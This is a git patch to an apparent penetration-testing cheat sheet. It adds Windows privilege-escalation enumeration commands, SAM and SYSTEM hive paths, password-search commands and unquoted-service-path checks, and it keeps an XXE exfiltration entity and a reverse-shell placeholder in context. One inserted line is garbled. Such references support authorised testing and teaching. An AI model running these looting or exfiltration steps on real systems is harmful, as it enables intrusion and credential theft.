From 38c3bfbd9fd6ead43cd3677a9f0b809a0d48f131 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 25 Dec 2018 15:19:45 +0100
Subject: [PATCH] Windows Priv Esc - Unquoted Path, Password looting and
 Powershell version

---
 .../Windows - Privilege Escalation.md         | 97 ++++++++++++++++++-
 XXE injection/README.md                       |  9 ++
 2 files changed, 102 insertions(+), 4 deletions(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 346ad27..d5bc2ea 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -4,6 +4,7 @@
 
 ```powershell
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+wmic qfe
 ```
 
 Architecture
@@ -16,12 +17,15 @@ List all env variables
 
 ```powershell
 set
+Get-ChildItem Env: | ft Key,Value
 ```
 
 List all drives
 
 ```powershell
 wmic logicaldisk get caption || fsutil fsinfo drives
+wmic logicaldisk get caption,description,providername
+Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
 
 ## User Enumeration
@@ -30,18 +34,28 @@ Get current username
 
 ```powershell
 echo %USERNAME% || whoami
+$env:username
+```
+
+List user privilege
+
+```powershell
+whoami /priv
 ```
 
 List all users
 
 ```powershell
 net user
+net users
 whoami /all
+Get-LocalUser | ft Name,Enabled,LastLogon
+Get-ChildItem C:\Users -Force | select Name
 ```
 
 List logon requirements; useable for bruteforcing
 
-```powershell
+```powershell$env:usernadsc
 net accounts
 ```
 
@@ -57,32 +71,39 @@ List all local groups
 
 ```powershell
 net localgroup
+Get-LocalGroup | ft Name
 ```
 
 Get details about a group (i.e. administrators)
 
 ```powershell
 net localgroup administrators
+Get-LocalGroupMember Administrators | ft Name, PrincipalSource
+Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
 ```
 
 ## Network Enumeration
 
-List all network interfaces
+List all network interfaces, IP, and DNS.
 
 ```powershell
 ipconfig /all
+Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
+Get-DnsClientServerAddress -AddressFamily IPv4 | ft
 ```
 
 List current routing table
 
 ```powershell
 route print
+Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
 ```
 
 List the ARP table
 
 ```powershell
 arp -A
+Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
 ```
 
 List all current connections
@@ -103,12 +124,31 @@ List all network shares
 net share
 ```
 
+SNMP Configuration
+
+```powershell
+reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
+Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
+```
+
 ## Looting for passwords
 
+### SAM and SYSTEM files
+
+```powershell
+%SYSTEMROOT%\repair\SAM
+%SYSTEMROOT%\System32\config\RegBack\SAM
+%SYSTEMROOT%\System32\config\SAM
+%SYSTEMROOT%\repair\system
+%SYSTEMROOT%\System32\config\SYSTEM
+%SYSTEMROOT%\System32\config\RegBack\system
+```
+
 ### Search for file contents**
 
 ```powershell
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
+findstr /si password *.xml *.ini *.txt *.config
 ```
 
 ### Search for a file with a certain filename
@@ -165,12 +205,22 @@ Example content
 
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 
-## Processes Enumeration
+### IIS Web config
+
+```powershell
+Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
+```
+
+## Processes Enumeration and Tasks
 
 What processes are running?
 
 ```powershell
 tasklist /v
+net start
+sc query
+Get-Service
+Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
 ```
 
 Which processes are running as "system"
@@ -185,6 +235,32 @@ Do you have powershell magic?
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
 
+List installed programs
+
+```powershell
+Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
+Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
+```
+
+Scheduled tasks
+
+```powershell
+schtasks /query /fo LIST 2>nul | findstr TaskName
+Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
+```
+
+Startup tasks
+
+```powershell
+wmic startup get caption,command
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
+dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
+```
+
+
 ## Using PowerSploit's PowerUp
 
 Spot the weak service using PowerSploit's PowerUp
@@ -206,6 +282,18 @@ wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 
+## Unquoted Service Paths
+
+The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
+
+```powershell
+wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
+
+gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
+```
+
+
+
 ## References
 
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
@@ -213,4 +301,5 @@ wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
-* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
\ No newline at end of file
+* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
+* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
\ No newline at end of file
diff --git a/XXE injection/README.md b/XXE injection/README.md
index 384e5c9..5230cbd 100644
--- a/XXE injection/README.md	
+++ b/XXE injection/README.md	
@@ -10,6 +10,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
 
 ## Summary
 
+- [Tools](#tools)
 - [Exploit](#exploit)
 - [Basic XXE](#basic-xxe)
 - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
@@ -17,6 +18,13 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
 - [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
 - [XXE in exotic files](#xxe-in-exotic-files)
 
+## Tools
+
+- [xxeftp](https://github.com/staaldraad/xxeserv)
+  ```
+  sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
+  ```
+
 ## Exploit
 
 Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
@@ -184,6 +192,7 @@ File stored on http://127.0.0.1/dtd.xml
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
 ```
 
+
 ## XXE in exotic files
 
 ### XXE inside SOAP